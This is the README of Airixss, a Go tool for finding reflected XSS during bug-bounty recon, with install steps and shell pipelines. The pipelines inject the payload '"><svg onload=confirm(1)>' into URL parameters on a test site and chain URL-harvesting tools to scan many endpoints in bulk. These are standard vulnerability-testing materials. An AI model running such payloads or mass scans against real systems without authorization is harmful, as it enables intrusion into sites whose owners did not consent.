Silentsoul04/airixss

Finding XSS during recon

Airixss

Usage • Installation

Airixss is for checking reflection in recon process to find possible xss vulnerable endpoints.

Contents:

• Installation
• Usage
  • Adding Headers
  • Using Proxy
  • Headless Mode
  • Using with other tools

- Installation & Requirements:

You need to install chromedp lib first ->

▶ go install github.com/chromedp/chromedp@latest

Installing the tool ->

Using go

▶ go install github.com/ferreiraklet/airixss@latest

Using git clone

▶ git clone https://github.com/ferreiraklet/airixss.git
▶ cd airixss
▶ go build airixss.go
▶ chmod +x airixss
▶ ./airixss -h

- Usage & Explanation:

In Your recon process, you may find endpoints that can be vulnerable to xss,

• Ex: https://redacted.com/index.php?msg=SameValue

• By replacing the "SameValue" to a xss payload, In order to see if there is reflection/vulnerable, it is when you use airixss

Stdin - Single urls

echo 'https://redacted.com/index.php?user=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E' | airixss -payload "confirm(1)"

echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | bhedak '"><svg onload=confirm(1)>' | airixss -p "confirm(1)"

In -payload flag, you need to specify a part of the payload used in url, -payload "value_will_be_checked_reflection"

Stdin - Read from File

cat targets | airixss -payload "alert(1)"

Adding Headers

Pay attention to the syntax!

echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -H "header1: value1;Header2: value2"

Using Proxy

echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -x "http://yourproxy"

Headless Mode

Headless mode is a "simulated" browser process that checks for the xss pop-up

It has much more accuracy, however, it is slower than normal method. ( experimental mode )

Usage:

• Attention - Using more than 5 concurrencys may generate errors!

echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss --headless-mode -c 5

echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss -hm -s -c 5

Using Proxy:

echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss -hm -c 5 -x "http://yourproxy"

Chaining with other tools

echo "http://testphp.vulnweb.com" | waybackurls | anew | gf xss | qsreplace '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -H "Header1: Value1;Header2: value2"

echo "http://testphp.vulnweb.com" | waybackurls | nilo | anew | gf xss | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -H "Header1: Value1;Header2: value2" --proxy "http://yourproxy"

echo "http://testphp.vulnweb.com" | waybackurls | nilo | anew | gf xss | qsreplace -a | bhedak '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -H "Header1: Value1;Header2: value2" -x "http://yourproxy"

echo "http://testphp.vulnweb.com" | waybackurls | anew | gf xss | uro | nilo | qsreplace '"><svg onload=confirm(1)>' | airixss -hm -s -c 5

Check out some of my other programs

Nilo - Checks if URL has status 200

Jeeves - Time based blind Injection Scanner

Please, also check these =>

GXSS

Dalfox

If any error in the program, talk to me immediatly.

This project is for educational and bug bounty porposes only! I do not support any illegal activities!.